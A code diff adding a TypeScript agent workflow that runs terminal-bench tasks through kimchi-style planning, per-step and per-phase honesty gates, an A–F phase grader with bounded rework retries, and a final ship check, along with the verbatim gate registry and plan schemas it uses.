+ * The commit this STEP starts from — kimchi's `stepStartRef`, captured at `start_ferment_step` and
+ * "consumed at complete_ferment_step for diff evidence" (runtime-state-store.ts:11).
+ *
+ * Outside the attempt loop deliberately: a second attempt continues the first one's work, so the range
+ * has to cover both. Anchored per step rather than per phase for the same reason in reverse — S1 asks
+ * whether THIS step's summary is in the diff, and a phase-wide range would drag in every earlier step.
+ *
+ * The SHA is all that is handed over, which is all kimchi hands over (`derive-state.ts:150`). The agent
+ * reading it made the edits itself; `git diff <ref>` is one command, and a version of this file that
+ * gathered the diff and pasted it in was serving a reader that no longer exists.
+ */
+const stepStartRef = createStep({
+	name: "step-start-ref",
+	description: "The commit this step starts from",
+	output: Type.Object({ ref: Type.String() }),
+	optional: true,
+	run: async ({ abortSignal }) => ({ ref: await currentGitRef(abortSignal) }),
+})
+
+const stepBody = createWorkflow({ name: "step" })
+	.then(stepCtx)
+	.then(stepStartRef)
+	.dountil(stepAttempt, (_ctx, last) => stepSettled(last as StepCheck), {
+		name: "attempts",
+		maxIterations: STEP_MAX_ATTEMPTS + 1,
+	})
+	.commit()
+
+// -- One phase --------------------------------------------------------------------------------------
+
+const phaseCtx = createStep({
+	name: "phase-ctx",
+	description: "The phase this item is about",
+	input: phaseItemSchema,
+	output: phaseItemSchema,
+	run: ({ input }) => input,
+})
+
+/**
+ * kimchi's `refine_ferment_phase`, reached by the same rule its engine uses (`determineNextAction`
+ * case 7: an active phase with no steps). A one-shot plan normally arrives with steps, so this arm is
+ * skipped — it exists because a plan that omits them would otherwise silently run an empty phase.
+ */
+const refineSteps = createAgentStep({
+	name: "refine-steps",
+	description: "Break a phase with no steps into concrete ones",
+	output: refineSchema,
+	background: true,
+	optional: true,
+	retry: { maxRetry: 0 },
+	prompt: ({ ctx }) => {
+		const item = ctx.getStepResult<PhaseItem>("phase-ctx")
+		return refinePrompt({
+			intent: intentOf(ctx),
+			plan: planOf(ctx),
+			phaseIndex: item?.index ?? 1,
+			phaseCount: item?.total ?? 1,
+			phase: item?.phase ?? { name: "(unknown)", goal: "(unknown)" },
+		})
+	},
+})
+
+const refineRound = createWorkflow({ name: REFINE_ARM }).then(refineSteps).commit()
+
+const needsRefine = (ctx: RunContext): boolean =>
+	(ctx.getStepResult<PhaseItem>("phase-ctx")?.phase.steps?.length ?? 0) === 0
+
+const stepSelector = (ctx: RunContext): readonly StepItem[] => {
+	const refined = ctx.getStepResult<Record<string, Static<typeof refineSchema> | undefined>>("refine")?.[REFINE_ARM]
+	const steps = refined?.steps ?? ctx.getStepResult<PhaseItem>("phase-ctx")?.phase.steps ?? []
+	return steps.map((step, index) => ({ index: index + 1, total: steps.length, step }))
+}
+
+const phaseGates = createAgentStep({
+	name: "phase-gates",
+	description: "Answer the phase-scope gates on what the phase actually delivered",
+	output: phaseGatesSchema,
+	background: true,
+	optional: true,
+	retry: { maxRetry: 0 },
+	// kimchi's `complete_ferment_phase` — the same orchestrator turn again, so the same session. F1 asks it
+	// to "read the S2 verdicts from every step in this phase", which are verdicts it gave itself.
+	resumable: ORCHESTRATOR_SESSION,
+	prompt: ({ ctx }) => {
+		const item = ctx.getStepResult<PhaseItem>("phase-ctx")
+		const steps = (ctx.getStepResult<(StepCheck | undefined)[]>("steps") ?? []).filter(
+			(step): step is StepCheck => step !== undefined,
+		)
+		return phaseGatesPrompt({
+			plan: planOf(ctx),
+			phaseIndex: item?.index ?? 1,
+			phaseCount: item?.total ?? 1,
+			phase: item?.phase ?? { name: "(unknown)", goal: "(unknown)" },
+			steps,
+		})
+	},
+})
+
+/**
+ * The phase grader (kimchi's `judgePhaseGradeViaSubagent`), and the thing that makes a phase's closing
+ * turn a decision rather than a formality: after the F gates pass, an independent grader assigns A–F
+ * and **A/B advance while C/D/F refuse**.
+ *
+ * kimchi spawns it as a subagent WITH tools ("verify the agent's claims independently"), unlike its two
+ * plain-API judges, so a background agent step is the faithful shape here rather than a compromise. It
+ * is `optional` for the same reason kimchi treats an unreachable judge as advisory: a grader that never
+ * answered must not block a phase (`gradeRefuses` reads `undefined` as no refusal).
+ */
+const phaseGrade = createAgentStep({
+	name: "phase-grade",
+	description: "Grade the completed phase A-F against what the machine actually shows",
+	output: phaseGradeSchema,
+	background: true,
+	optional: true,
+	retry: { maxRetry: 0 },
+	prompt: ({ ctx }) => {
+		const item = ctx.getStepResult<PhaseItem>("phase-ctx")
+		const gates = ctx.getStepResult<PhaseGates>("phase-gates")
+		const steps = (ctx.getStepResult<(StepCheck | undefined)[]>("steps") ?? []).filter(
+			(step): step is StepCheck => step !== undefined,
+		)
+		const diff = ctx.getStepResult<DiffEvidence>("phase-diff")
+		return phaseGraderPrompt({
+			plan: planOf(ctx),
+			phase: item?.phase ?? { name: "(unknown)", goal: "(unknown)" },
+			phaseSummary: gates?.summary ?? "",
+			stepSummaries: steps
+				.map((step) => `  ${step.index}. "${step.description}" — ${step.summary} [${step.verified}]`)
+				.join("\n"),
+			gateVerdicts: gates?.gates ?? [],
+			diff: diff ?? { available: false, filesChanged: "", diffSnippet: "", elidedBytes: 0 },
+			cwd: process.cwd(),
+		})
+	},
+})
+
+/** What changed in this phase, as evidence for the grader — kimchi's phase-start ref plus its diff. */
+const phaseStartRef = createStep({
+	name: "phase-start-ref",
+	description: "The commit this phase starts from",
+	output: Type.Object({ ref: Type.String() }),
+	optional: true,
+	run: async ({ abortSignal }) => ({ ref: await currentGitRef(abortSignal) }),
+})
+
+const phaseDiff = createStep({
+	name: "phase-diff",
+	description: "What this phase changed, for the grader",
+	output: Type.Object({
+		available: Type.Boolean(),
+		filesChanged: Type.String(),
+		diffSnippet: Type.String(),
+		elidedBytes: Type.Number(),
+	}),
+	optional: true,
+	run: async ({ ctx, abortSignal }) =>
+		phaseDiffSince(ctx.getStepResult<{ ref: string }>("phase-start-ref")?.ref ?? "", abortSignal),
+})
+
+type PhaseClose = {
+	accepted: boolean
+	retry: number
+	grade: PhaseGrade | undefined
+	refused: boolean
+	minimum: string
+	flags: { id: string; rationale: string; evidence: string }[]
+}
+
+const phaseCloseSchema = Type.Object({
+	accepted: Type.Boolean(),
+	retry: Type.Number(),
+	grade: Type.Optional(phaseGradeSchema),
+	refused: Type.Boolean(),
+	minimum: Type.String(),
+	flags: Type.Array(Type.Object({ id: Type.String(), rationale: Type.String(), evidence: Type.String() })),
+})
+
+/**
+ * kimchi's `judgeRefused` branch, as a decision: below the bar the phase does not complete and the
+ * agent is handed the recommendations to address (bounded by `MAX_BLOCK_RETRIES`, after which the grade
+ * is accepted and the phase advances anyway — "the agent had its retries; we don't block continuation
+ * indefinitely").
+ */
+const phaseClose = createStep({
+	name: "phase-close",
+	description: "Does this phase clear its gates and the grader, or does it get another rework",
+	output: phaseCloseSchema,
+	run: ({ ctx, logger }) => {
+		const priorRetries = ctx.getStepResult<{ retry: number }>("close-clock")?.retry ?? 0
+		const gates = ctx.getStepResult<PhaseGates>("phase-gates")
+		const grade = ctx.getStepResult<Record<string, PhaseGrade | undefined>>("grading")?.[GRADE_ARM]
+
+		// Two ways a phase is refused, and kimchi runs them in this order (`phases.ts`): a flagged F gate
+		// feeds the retry/escalation pipeline FIRST — unlike a step gate, it is not an immediate refusal but
+		// it does buy a rework — and only a phase with no block flags reaches the grader at all. Then the
+		// grade decides: A/B advance, C/D/F refuse.
+		const flagged = hasBlockingFlag(gates?.gates)
+		const refused = flagged || gradeRefuses(grade?.grade, priorRetries)
+		const retry = refused ? priorRetries + 1 : priorRetries
+		// Exhausting the budget accepts rather than looping: kimchi advances after MAX_BLOCK_RETRIES,
+		// because "the agent had its retries; we don't block continuation indefinitely".
+		const accepted = !refused || retry > MAX_BLOCK_RETRIES
+		logger.info("phase closing turn finished", {
+			flagged,
+			grade: grade?.grade ?? null,
+			minimum: minimumAcceptableGrade(priorRetries),
+			refused,
+			retry,
+			accepted,
+		})
+		return {
+			accepted,
+			retry,
+			grade,
+			refused,
+			minimum: minimumAcceptableGrade(priorRetries),
+			flags: flaggedGatesOf(gates),
+		}
+	},
+})
+
+/** The F verdicts that blocked, in the shape the rework prompt and `phase-result` read. */
+const flaggedGatesOf = (gates: PhaseGates | undefined): { id: string; rationale: string; evidence: string }[] =>
+	(gates?.gates ?? [])
+		.filter((gate) => normalizeVerdict(gate.verdict) === "flag")
+		.map((gate) => ({ id: gate.id, rationale: gate.rationale, evidence: gate.evidence }))
+
+/**
+ * How many reworks this phase has already had, read at the TOP of a closing turn.
+ *
+ * Same reason as `attempt-clock`: `phase-close` cannot count itself, and a loop body's
+ * static key drops the iteration index, so its own key is exactly what a bare self-read would hit.
+ */
+const closeClock = createStep({
+	name: "close-clock",
+	description: "How many times this phase has been sent back",
+	output: Type.Object({ retry: Type.Number(), refused: Type.Boolean() }),
+	run: ({ ctx }) => {
+		const previous = ctx.getStepResult<PhaseClose>("phase-close")
+		return { retry: previous?.retry ?? 0, refused: previous?.refused === true }
+	},
+})
+
+/** The rework kimchi's planner would dispatch on a refusal: address the grader's recommendations. */
+const phaseRework = createAgentStep({
+	name: "phase-rework",
+	description: "Address the grader's recommendations before the phase is graded again",
+	output: workerReportSchema,
+	background: true,
+	optional: true,
+	retry: { maxRetry: 0 },
+	maxDurationMs: FERMENT_WORKER_BUDGETS.standard.maxDuration * 1000,
+	prompt: ({ ctx }) => {
+		const item = ctx.getStepResult<PhaseItem>("phase-ctx")
+		const close = ctx.getStepResult<PhaseClose>("phase-close")
+		return phaseReworkPrompt({
+			plan: planOf(ctx),
+			phase: item?.phase ?? { name: "(unknown)", goal: "(unknown)" },
+			grade: close?.grade,
+			flags: close?.flags ?? [],
+			minimum: close?.minimum ?? "A",
+			retry: close?.retry ?? 1,
+			maxRetries: MAX_BLOCK_RETRIES,
+		})
+	},
+})
+
+const reworkRound = createWorkflow({ name: REWORK_ARM }).then(phaseRework).commit()
+
+/** A rework runs only on a closing turn that follows a refusal — the first pass through has nothing to fix. */
+const needsRework = (ctx: RunContext): boolean =>
+	ctx.getStepResult<{ refused: boolean }>("close-clock")?.refused === true
+
+/** One row of the phase table the ship check reads. Collected here so the foreach's output is self-describing. */
+const phaseResultSchema = Type.Object({
+	index: Type.Number(),
+	name: Type.String(),
+	summary: Type.String(),
+	verdicts: Type.String(),
+	grade: Type.String(),
+	flagged: Type.Boolean(),
+	stepsDone: Type.Number(),
+	stepsTotal: Type.Number(),
+})
+type PhaseResult = Static<typeof phaseResultSchema>
+
+const phaseResult = createStep({
+	name: "phase-result",
+	description: "Summarize the phase for the ship check",
+	output: phaseResultSchema,
+	run: ({ ctx }) => {
+		// `phase-ctx` is the foreach item itself and cannot be absent — if it is, the path below is wrong
+		// too, and silently reading phase 1's record would be worse than stopping.
+		const item = mustRead<PhaseItem>(ctx, "phase-ctx", "it is the item this phase body was handed")
+		// Explicit paths, because this step sits OUTSIDE the closing loop while the gates and the grade sit
+		// inside it: a bare read resolves to `phases@N/phase-gates`, which does not exist. Loop iteration
+		// indices are dropped from the static key, so `close/…` names the LAST closing turn —
+		// the accepted one. `phase-close` is a function step with no failure mode, so its absence is an
+		// addressing bug; the gates are an `optional` agent step, so theirs is not.
+		const close = mustRead<PhaseClose>(
+			ctx,
+			`phases@${item.index - 1}/close/phase-close`,
+			"every closing turn records one",
+		)
+		const gates = ctx.getStepResult<PhaseGates>(`phases@${item.index - 1}/close/phase-gates`)
+		const steps = (ctx.getStepResult<(StepCheck | undefined)[]>("steps") ?? []).filter(
+			(step): step is StepCheck => step !== undefined,
+		)
+		return {
+			index: item.index,
+			name: item.phase.name,
+			summary: gates?.summary ?? "(no phase summary)",
+			verdicts: (gates?.gates ?? []).map((gate) => `${gate.id}:${gate.verdict}`).join(" ") || "(none)",
+			grade: close.grade?.grade ?? "(ungraded — the grader returned nothing)",
+			flagged: close.flags.length > 0,
+			stepsDone: steps.filter((step) => step.done).length,
+			stepsTotal: steps.length,
+		}
+	},
+})
+
+/**
+ * The phase's closing turn, and it can repeat: gates → grade → decide, with a rework in front of every
+ * attempt after the first. This is kimchi's `complete_ferment_phase` loop — a refused grade sends the
+ * agent back with the grader's recommendations and the phase is completed again, up to
+ * `MAX_BLOCK_RETRIES` times.
+ */
+const gradeRound = createWorkflow({ name: GRADE_ARM }).then(phaseGrade).commit()
+
+/**
+ * kimchi grades a phase only once its gates are clean: "Step 4: no block flags from gates or project
+ * checks. Run the per-phase LLM grader." A flagged phase goes straight to the retry pipeline, so the
+ * grader spawn is never bought for work already known to be blocked.
+ */
+const gradeable = (ctx: RunContext): boolean => !hasBlockingFlag(ctx.getStepResult<PhaseGates>("phase-gates")?.gates)
+
+const phaseClosing = createWorkflow({ name: "closing" })
+	.then(closeClock)
+	.branch([[needsRework, reworkRound]], { name: "rework" })
+	.then(phaseDiff)
+	.then(phaseGates)
+	.branch([[gradeable, gradeRound]], { name: "grading" })
+	.then(phaseClose)
+	.commit()
+
+const phaseBody = createWorkflow({ name: "phase" })
+	.then(phaseCtx)
+	.then(phaseStartRef)
+	.branch([[needsRefine, refineRound]], { name: "refine" })
+	.foreach(stepBody, stepSelector, { name: "steps" })
+	.dountil(phaseClosing, (_ctx, last) => (last as PhaseClose).accepted, {
+		name: "close",
+		maxIterations: MAX_BLOCK_RETRIES + 2,
+	})
+	.then(phaseResult)
+	.commit()
+
+const phaseSelector = (ctx: RunContext): readonly PhaseItem[] => {
+	const phases = planOf(ctx)?.phases ?? []
+	return phases.map((phase, index) => ({ index: index + 1, total: phases.length, phase }))
+}
+
+// -- Ship -------------------------------------------------------------------------------------------
+
+const ship = createAgentStep({
+	name: "ship",
+	description: "Walk the P3 checklist and answer the ferment-scope gates",
+	output: shipGatesSchema,
+	background: true,
+	optional: true,
+	retry: { maxRetry: 0 },
+	// kimchi's `complete_ferment`, the last of the orchestrator's four turns. C1 walks "the P3 checklist
+	// declared at scope time" and C3 reads "every S2 and F1 verdict across the ferment" — one session's
+	// own record in both cases, which is the whole reason the ship check can mean anything.
+	resumable: ORCHESTRATOR_SESSION,
+	prompt: ({ ctx }) => {
+		const phases = (ctx.getStepResult<(PhaseResult | undefined)[]>("phases") ?? []).filter(
+			(phase): phase is PhaseResult => phase !== undefined,
+		)
+		return shipPrompt({ intent: intentOf(ctx), plan: planOf(ctx), phases })
+	},
+})
+
+const report = createStep({
+	name: "report",
+	description: "Summarize the run for the log",
+	output: Type.Object({
+		shipped: Type.Boolean(),
+		phases: Type.Number(),
+		steps: Type.Number(),
+		stepsDone: Type.Number(),
+	}),
+	run: ({ ctx }) => {
+		const phases = (ctx.getStepResult<(PhaseResult | undefined)[]>("phases") ?? []).filter(
+			(phase): phase is PhaseResult => phase !== undefined,
+		)
+		const gates = ctx.getStepResult<Static<typeof shipGatesSchema>>("ship")
+		return {
+			// Shipped means what `complete_ferment` means: the C gates were voted and none of them flagged.
+			shipped: gates !== undefined && !hasBlockingFlag(gates.gates),
+			phases: phases.length,
+			steps: phases.reduce((total, phase) => total + phase.stepsTotal, 0),
+			stepsDone: phases.reduce((total, phase) => total + phase.stepsDone, 0),
+		}
+	},
+})
+
+export default createWorkflow({
+	name: "ferment-oneshot",
+	description:
+		"Run a terminal-bench task as kimchi's one-shot ferment: scope it into phases and steps, do each step and answer for it, gate every completion",
+	input: taskInputSchema,
+	// Deliberately no `defaultModel` here. Per-step model resolution is step `model` → workflow
+	// `defaultModel` → the harness/session default; no step in this workflow
+	// declares its own `model` either, so leaving `defaultModel` unset makes every step fall through to
+	// whatever `--model` the harbor adapter launched kimchi with. A hardcoded default here would silently
+	// override the benchmark's model selection for every run that does not happen to match it — which is
+	// exactly the failure mode this workflow exists to be compared honestly against `tb-solver` without.
+})
+	// Scoping repeats while the planner is still asking, exactly as kimchi's interview does: ask, hear the
+	// judge, replan. No round cap — the loop's `maxIterations` default is a runaway guard the builder
+	// requires, and the run's own deadline is what actually ends a planner that never converges.
+	.dountil(scopeRound, (_ctx, last) => (last as ScopeCheck).ready, { name: "scoping" })
+	// Phases run in the order the plan gives them, one at a time. Sequential is not a simplification here:
+	// concurrent items must have non-overlapping side effects, which two agents editing
+	// the same container cannot promise.
+	.foreach(phaseBody, phaseSelector, { name: "phases" })
+	.then(ship)
+	.then(report)
+	.commit()

--- a/benchmark/terminal-bench-2/workflows/ferment/contract.ts
+++ b/benchmark/terminal-bench-2/workflows/ferment/contract.ts
@@ -1,0 +1,547 @@
+/**
+ * The one-shot ferment's vocabulary, ported from kimchi.
+ *
+ * Everything here has a counterpart in the kimchi checkout, and the port is deliberately literal — a
+ * field that exists there exists here, with the same name and the same LLM-visible description, because
+ * the point of this workflow is to run the SAME instruction set through the engine instead of through
+ * the ferment tool loop:
+ *
+ *  | here                    | kimchi                                                        |
+ *  | ----------------------- | ------------------------------------------------------------- |
+ *  | `planSchema`            | `ScopeParams` (src/extensions/ferment/tool-schemas.ts)         |
+ *  | `refineSchema`          | `RefineParams`                                                 |
+ *  | `workerReportSchema`    | `submit_agent_report` (src/extensions/agents/worker-report.ts) |
+ *  | `stepGatesSchema` etc.  | `CompleteStepParams.gates` + the gate registry                 |
+ *  | `GATE_REGISTRY`         | src/extensions/ferment/gate-registry.ts (verbatim)             |
+ *  | `FERMENT_WORKER_BUDGETS`| src/extensions/agents/worker-budget-policy.ts (verbatim)       |
+ *
+ * What is NOT ported: `ferment_id` / `phase_id` / `step_id` and every other tool-call parameter whose
+ * only job was to tell the ferment state machine which record a turn was addressing. The engine's data
+ * flow already knows — that is the whole trade this workflow makes.
+ *
+ * The gate ids that a turn owns are pinned by the schema (a literal union per turn) rather than by
+ * kimchi's `assertGateCoverage`, so a missing or misnamed gate is a schema violation the engine steers
+ * on, instead of a tool error the model has to be told about.
+ */
+import { type Static, Type } from "typebox"
+
+// -- Input -------------------------------------------------------------------------------------------
+
+/**
+ * The workflow's top-level input, validated by the extension against `--input @<file>` before the run
+ * starts. The harbor adapter's envelope is `{"instruction": ...}` —
+ * see `src/kimchi_agent/workflow_agent.py`'s `_pre_launch_commands` — so that is exactly the shape here.
+ *
+ * A copy rather than a shared import: the sibling `tb-solver.workflow.ts` (kimchi-workflows repo) still
+ * declares its own `taskInputSchema` with a `deadlineIso` field, because `tb-solver`'s scheduling divides
+ * a budget across its stages and needs a clock to divide. This workflow deliberately has no such
+ * scheduling and never reads a deadline anywhere in its steps, so `deadlineIso` is dropped here rather
+ * than carried as dead weight — a required field the adapter never sends would fail every run's input
+ * validation before the first step even starts. The run is bounded by harbor's own agent-phase timeout
+ * instead, which this workflow is never told about and does not need to be.
+ */
+export const taskInputSchema = Type.Object({
+	/** The verbatim terminal-bench instruction. */
+	instruction: Type.String(),
+})
+
+// -- Gates ------------------------------------------------------------------------------------------
+
+/**
+ * Ported verbatim from kimchi's `gate-registry.ts`: the question and the guidance are prompt text.
+ *
+ * **Verbatim includes the PERSON, and that is not a stylistic detail.** kimchi writes every gate in the
+ * second person — "Read your own summary", "Classify your own verify command honestly", "would make your
+ * work fail", "List anything you couldn't do". It is talking to the ORCHESTRATOR: the one long-running
+ * ferment session that wrote the plan, DID this step's work, and is about to record its summary. That
+ * agent owns the work and wants it to land; the gates are the honesty check it runs on itself before
+ * advancing. Six live one-shot runs settle who that is — all 31 `complete_ferment_step` calls omitted
+ * `worker_agent_id`, and the orchestrator session spent 108 `bash`, 16 `write` and 13 `edit` calls with
+ * zero agent spawns. "Your own summary" is literal: it wrote the summary because it did the work.
+ *
+ * This port had rewritten the S gates (and F3) into the third person — "Read the step's summary", "the
+ * verify command", "this work", "anything that could not be done". Same questions, different addressee:
+ * an outside assessor asked whether SOMEONE ELSE'S work is sound. It behaves accordingly. Measured over
+ * one live run: S3 flagged 21 times against 15 passes — it refused more often than it passed, on correct
+ * work, once flagging a successful `pip install` because "a network outage would cause pip install to
+ * fail and there is no offline fallback". Native kimchi over the same tasks: 32 steps, 1 retry, 6/6.
+ *
+ * The words are the mechanism. Do not paraphrase them.
+ *
+ * The only substitution left is a tool name with no counterpart here: kimchi's P3/F3 name the
+ * `complete_ferment` tool, and this workflow's equivalent is the ship check (`ship`).
+ */
+export const GATE_REGISTRY = {
+	P1: {
+		id: "P1",
+		question: "Does each phase have a verifiable success signal?",
+		guidance: [
+			"For every proposed phase, point to the concrete check that proves it succeeded.",
+			"A check is a bash command exit, a passing test, a function that returns a value matching a spec — something a script can decide.",
+			'Reject "looks good", "compiles", or "no errors logged" as success signals — those are not verifications.',
+			"Return 'flag' if any phase has no verifiable signal; 'pass' only when every phase does.",
+		].join("\n"),
+	},
+	P2: {
+		id: "P2",
+		question: "Are phases ordered so each one's output is the next one's input?",
+		guidance: [
+			"Walk the phase list and confirm phase N produces something phase N+1 consumes.",
+			"Independent buckets of work that don't compose are a structural smell — flag them.",
+			"Parallel-group phases are exempt from sequencing but must converge into a shared next phase's input.",
+			"Return 'omitted' for single-phase ferments.",
+		].join("\n"),
+	},
+	P3: {
+		id: "P3",
+		question: "What evidence must the final ship check see to ship?",
+		guidance: [
+			"Declare the explicit checklist the ship check will validate against — files exist, tests pass, behavior demonstrated.",
+			"This list is the contract C1 will walk at ship time. Vague entries here become uncatchable failures later.",
+			"Cite the success criteria from the scope. If success criteria is empty, write one now.",
+		].join("\n"),
+	},
+	S1: {
+		id: "S1",
+		question: "Does the summary describe work present in the diff?",
+		guidance: [
+			"Read your own summary. For each concrete claim (file path, function name, behavior), cite the diff line that proves it.",
+			"If you claim a file you didn't touch, or a function not in the diff — flag this gate.",
+			"Empty diff with a non-trivial summary is always a flag.",
+			"'omitted' is only valid for steps with no code change (e.g. research, planning).",
+		].join("\n"),
+	},
+	S2: {
+		id: "S2",
+		question: "What did the verify command actually exercise?",
+		guidance: [
+			"Classify your own verify command honestly:",
+			"  - smoke:   runs the artifact end-to-end (function call, CLI invocation, request/response)",
+			"  - test:    executes a real test that asserts behavior",
+			"  - syntactic: type-check, compile-check, lint — proves shape, not behavior",
+			"  - proxy:   greps output, checks file existence, counts lines — proves nothing about correctness",
+			"  - sentinel: touches a file or echoes a string — pure ceremony, no signal",
+			"Put that classification in rationale/evidence. The verdict itself should still be pass, flag, or omitted.",
+			"Return 'flag' if your verify is proxy or sentinel for a step that claims semantic work.",
+			"Return 'omitted' for steps with no verification command (your S1 evidence carries the weight).",
+		].join("\n"),
+	},
+	S3: {
+		id: "S3",
+		question: "What edge case would break this step?",
+		guidance: [
+			"Name one concrete input or condition that would make your work fail.",
+			"Empty input, malformed input, concurrent access, missing dependency, network failure — pick the most likely.",
+			"Then state whether your work handles it. If not, that's a 'flag' — you've identified a known gap.",
+			"'omitted' is only valid for steps with no externally-driven behavior (pure config edits, doc-only changes).",
+		].join("\n"),
+	},
+	F1: {
+		id: "F1",
+		question: "Did every step's claim verify against real behavior, or are some proxies?",
+		guidance: [
+			"Read the S2 verdicts from every step in this phase.",
+			"If every step is 'proxy' or 'sentinel', the phase's verification trail is hollow — flag.",
+			"Mixed (some real verifications, some proxies) is acceptable if the real ones cover the load-bearing logic.",
+			"Cite which steps were proxy and why that's acceptable (or not).",
+		].join("\n"),
+	},
+	F2: {
+		id: "F2",
+		question: "Does the phase's combined output deliver the phase goal?",
+		guidance: [
+			"Restate the phase goal in one sentence, then map the union of step outputs to that goal.",
+			"A phase where every step is done but the phase goal is still not met is a 'flag'.",
+			"Cite the specific artifact (file, behavior, command output) that demonstrates the goal.",
+		].join("\n"),
+	},
+	F3: {
+		id: "F3",
+		question: "What was left undone or deferred in this phase?",
+		guidance: [
+			"List anything you couldn't do, skipped, or deferred — by step or by intent.",
+			"Be explicit. 'Nothing deferred' is a valid verdict only if it's actually true.",
+			"Deferred items will be read by C2 at ship time. Hiding them here makes the ship gate fail later.",
+			"Return 'pass' when nothing is deferred; 'flag' when items are deferred without explicit acceptance.",
+		].join("\n"),
+	},
+	C1: {
+		id: "C1",
+		question: "Is every success criterion from the plan satisfied? Cite evidence.",
+		guidance: [
+			"Walk the P3 checklist declared at scope time.",
+			"For each criterion, name the file, test, or command output that proves it.",
+			"Return 'flag' if any criterion is unmet or unverifiable — do not ship.",
+			"Return 'omitted' only when no success criteria were declared (P3 was 'omitted').",
+		].join("\n"),
+	},
+	C2: {
+		id: "C2",
+		question: "Are there phases with unresolved F3 (left-undone) items?",
+		guidance: [
+			"Read every phase's F3 verdict.",
+			"If a phase declared deferred items, either: (a) cite the later phase that resolved them, or (b) explicitly accept them as out-of-scope follow-ups.",
+			"Unresolved deferrals without explicit acceptance are 'flag' — the work is incomplete.",
+		].join("\n"),
+	},
+	C3: {
+		id: "C3",
+		question: "Did real verification ever execute the artifact, or is the work proxy-verified?",
+		guidance: [
+			"Read every S2 and F1 verdict across the ferment.",
+			"If the entire chain is proxy/sentinel/syntactic, the work has never actually run — 'flag', refuse ship.",
+			"Cite at least one step where verify was 'smoke' or 'test' and exercised the load-bearing artifact.",
+		].join("\n"),
+	},
+} as const
+
+export type GateId = keyof typeof GATE_REGISTRY
+
+/** The gate ids a turn owns — kimchi's `ownerTurn` column, one row per completion turn. */
+export const PLAN_GATES = ["P1", "P2", "P3"] as const
+export const STEP_GATES = ["S1", "S2", "S3"] as const
+export const PHASE_GATES = ["F1", "F2", "F3"] as const
+export const SHIP_GATES = ["C1", "C2", "C3"] as const
+
+/** kimchi's `renderGateGuidance(turn)`: the question + guidance block a completion turn is shown. */
+export function renderGateGuidance(ids: readonly GateId[]): string {
+	return ids
+		.map((id) => `**${id}** — ${GATE_REGISTRY[id].question}\n${GATE_REGISTRY[id].guidance}`)
+		.join("\n\n")
+		.trimEnd()
+}
+
+/**
+ * kimchi's `gateVerdictObject`, with the id narrowed to the turn's own gates. S2 keeps its
+ * classification aliases, which kimchi normalizes (smoke/test/syntactic → pass, proxy/sentinel → flag);
+ * {@link normalizeVerdict} does the same normalization here.
+ */
+const CANONICAL_VERDICTS = ["pass", "flag", "omitted"] as const
+const STEP_VERDICTS = [...CANONICAL_VERDICTS, "smoke", "test", "syntactic", "proxy", "sentinel"] as const
+
+function gateArray(ids: readonly GateId[], verdicts: readonly string[]) {
+	return Type.Array(
+		Type.Object({
+			id: Type.Union(
+				ids.map((id) => Type.Literal(id)),
+				{ description: `Gate id. Required ids for this turn: ${ids.join(", ")}.` },
+			),
+			verdict: Type.Union(
+				verdicts.map((verdict) => Type.Literal(verdict)),
+				{
+					description:
+						"'pass' = the gate's question is answered affirmatively with concrete evidence. 'flag' = the gate identifies a real problem. 'omitted' = the gate does not apply (requires rationale). Use only pass | flag | omitted.",
+				},
+			),
+			rationale: Type.String({
+				description: 'One sentence justifying the verdict. Required for every verdict including "pass" and "omitted".',
+			}),
+			evidence: Type.String({
+				description:
+					"File:line, quoted diff line, command output, or 'n/a' for omitted gates. Empty evidence is rejected.",
+			}),
+		}),
+		{
+			minItems: ids.length,
+			maxItems: ids.length,
+			description: `One verdict per gate, exactly these ids: ${ids.join(", ")}. A 'flag' refuses advancement.`,
+		},
+	)
+}
+
+/** kimchi normalizes S2's classification vocabulary before deciding whether a gate blocks. */
+export function normalizeVerdict(verdict: string): "pass" | "flag" | "omitted" {
+	switch (verdict) {
+		case "smoke":
+		case "test":
+		case "syntactic":
+			return "pass"
+		case "proxy":
+		case "sentinel":
+			return "flag"
+		case "flag":
+			return "flag"
+		case "omitted":
+			return "omitted"
+		default:
+			return "pass"
+	}
+}
+
+/** kimchi's `hasBlockingFlag`: any flag refuses advancement, and drives the same retry path. */
+export function hasBlockingFlag(gates: readonly { verdict: string }[] | undefined): boolean {
+	return (gates ?? []).some((gate) => normalizeVerdict(gate.verdict) === "flag")
+}
+
+// -- The plan ----------------------------------------------------------------------------------------
+
+/**
+ * kimchi's step shape, plus the `budget_tier` its planner picks per step at `start_ferment_step`.
+ *
+ * The tier moves EARLIER rather than away: there is no per-step planner turn here to choose it at
+ * dispatch time (that turn is exactly the orchestration the engine replaces), so the plan carries it and
+ * the step turn's prompt states it. The wording is kimchi's own, including "never infer it from
+ * description keywords" — and so is its force: it describes the work's shape, and nothing enforces it
+ * (see {@link FERMENT_WORKER_BUDGETS}).
+ */
+const stepSchema = Type.Object({
+	description: Type.String(),
+	verify: Type.Optional(Type.String({ description: "bash command that exits 0 on success" })),
+	budget_tier: Type.Optional(
+		Type.Union([Type.Literal("narrow"), Type.Literal("standard"), Type.Literal("complex")], {
+			description:
+				"Worker budget selected by scoped work shape: narrow for verification or one small edit; standard for normal implementation (default); complex for multi-file builds or iterative debugging. Select it from the scoped work shape; never infer it from description keywords.",
+		}),
+	),
+})
+
+/** kimchi's `PhaseProposalSchema`, minus `parallel_group` — see the workflow header on why phases run sequentially. */
+const phaseSchema = Type.Object({
+	name: Type.String(),
+	goal: Type.String(),
+	description: Type.Optional(Type.String()),
+	constraints: Type.Optional(Type.Array(Type.String())),
+	steps: Type.Array(stepSchema, {
+		description:
+			"Step breakdown for this phase — 1-4 steps, each with a description and, where possible, a verify command.",
+	}),
+})
+
+/** kimchi's `ScopingQuestionSchema`. In one-shot mode these go to the judge, never to a human. */
+const questionSchema = Type.Object({
+	id: Type.String({ description: "Stable identifier for this question." }),
+	type: Type.Optional(
+		Type.Union([Type.Literal("single"), Type.Literal("multi"), Type.Literal("text"), Type.Literal("confirm")], {
+			description:
+				"Question style: 'single' (one choice, default), 'multi' (multiple choices), 'text' (enter-your-own answer only), or 'confirm' (yes/no).",
+		}),
+	),
+	question: Type.String({
+		description:
+			"Canonical question sentence. Do not ask preference-survey questions when a safe default can be assumed; a request to be thorough with questions does not make default choices decision-blocking.",
+	}),
+	options: Type.Optional(
+		Type.Array(Type.Object({ id: Type.String(), label: Type.String(), recommended: Type.Optional(Type.Boolean()) }), {
+			description:
+				"2-5 concrete options for single/multi questions. Omit for text and confirm questions (confirm is always Yes/No). At most ONE option per question may be recommended.",
+		}),
+	),
+})
+
